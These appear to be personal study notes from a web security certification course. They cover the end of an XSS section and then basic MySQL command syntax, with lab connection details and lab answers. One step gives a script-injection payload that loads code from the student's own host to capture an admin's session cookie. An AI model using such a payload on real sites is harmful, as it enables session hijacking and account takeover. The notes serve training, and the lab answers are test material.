Yashh-G/CWES-Notes/README.md

 3. use this payload in the vulnerable parameter `'><script src=http://10.10.15.62/script.js></script>` then in the terminal we will receive an cookie of the admin
 4. we should avoid using JavaScript functions that allow changing raw text of HTML fields, like:
 `DOM.innerHTML, DOM.outerHTML, document.write(), document.writeln(), document.domain`

+## SQL Injection
+Command Line

+TIP:
+Every Query Should Be End with ; (semicolumn)

+***MySQL***
+`mysql -u root -p` # By using this command we will get an option to put password `mysql -u root -p<password>` # for directly entering in Mysql dbms without storing it anywhere/cleartext/logs/terminal History
+`mysql -u root -h docker.hackthebox.eu -P 3306 -p`  # in this command -P is for port and -h for defining the host

+*creating a database*
+`CREATE DATABASE users;` # creating users database in MySQL `SHOW DATABASES;` # for listing out all the databases `USE users;` # we can switch the database using this command (users is a database) `CREATE TABLE logins ( id INT, username VARCHAR(100), password VARCHAR(100), date_of_joining DATETIME );` # this query will create an login table (do AI For more)
+`SHOW TABELS;` # list out all the tables inside the databases `DESCRIBE logines;` # used to list the table structure with its fields and data types. (logines is a table name FYI)

+*Table Properties*

+AUTO_INCREMENT → The id number goes up by 1 automatically for each new row.
+NOT NULL → This column cannot be left empty (it’s required).
+UNIQUE → No two rows can have the same value in this column (e.g., no duplicate usernames).
+DEFAULT NOW() → If you don’t enter a date, it automatically uses the current date & time.
+PRIMARY KEY (id) → The id column becomes the unique identifier for each row.

+### command for connecting mysql server on diff host
+mysql -h 154.57.164.65 -P 32755 -u root -ppassword --skip-ssl-verify-server-cert # --skip-ssl-verify-server-cert for skipping the ssl/tls -h for hostname/IP

+#### Insert Statement in MySQL

+`INSERT INTO table_name VALUES (column1_value, column2_value, column3_value, ...);` # used to add a new record to the table
+`mysql> INSERT INTO logins VALUES(1, 'admin', 'p@ssw0rd', '2020-07-02');` # we are inserting some data into the login tables

+`INSERT INTO table_name(column2, column3, ...)
+VALUES (column2_value, column3_value, ...);` # rules like how to write a statement below is the actual example
+`INSERT INTO logins(username, password) VALUES('administrator', 'adm1n_p@ss');` # updating specific columns in this case username and password (logins is that table name)
+`mysql> INSERT INTO logins(username, password) VALUES ('john', 'john123!'), ('tom', 'tom123!');` # We can also add multiple recodes at once by seprating them with a comma

+#### Select Statment
+`SELECT * FROM table_name;` # the genral syntaxt to view entire table `SELECT column1, column2 FROM table_name;` # we can view data present in specific columns as well

+#### Drop statement
+Basically we can use this to remove tables and databases from server `DROP TABLE logins;` # for removing the table called logins from the database

+#### Alter statement
+We can use ALTER to change the name of any table and any of its fields or to delete or add a new column to an existing table.

+`ALTER TABLE logins ADD newColumn INT;` # this adds a new column newColumn to the logins table using ADD `mysql> ALTER TABLE logins RENAME COLUMN newColumn TO newerColumn;` # To rename a column, we can use RENAME COLUMN `mysql> ALTER TABLE logins MODIFY newerColumn DATE;` # We can also change a column's datatype with MODIFY `ALTER TABLE logins DROP newerColumn;` # we can also drop an coulmn from a table using a Drop with alter statement

+#### Update Statement
+UPDATE statement can be used to update specific records within a table, based on certain conditions.

+`UPDATE table_name SET column1=newvalue1, column2=newvalue2, ...
+WHERE <condition>;` # general syntax
+`mysql> UPDATE logins SET password = 'change_password' WHERE id > 1;` # We specify the table name, each column and its new value, and the condition for updating records.
+The query above updated all passwords in all records where the id was more significant than 1.

+Ans for the lab:
+mysql -h 154.57.164.65 -P 32755 -u root -ppassword --skip-ssl-verify-server-cert # first authenticated SHOW DATABASES; # list databases
+USE employees; # use the database which we want in this case employees show tables; # list out tables from the database SELECT * FROM developement # view all the info from the developement table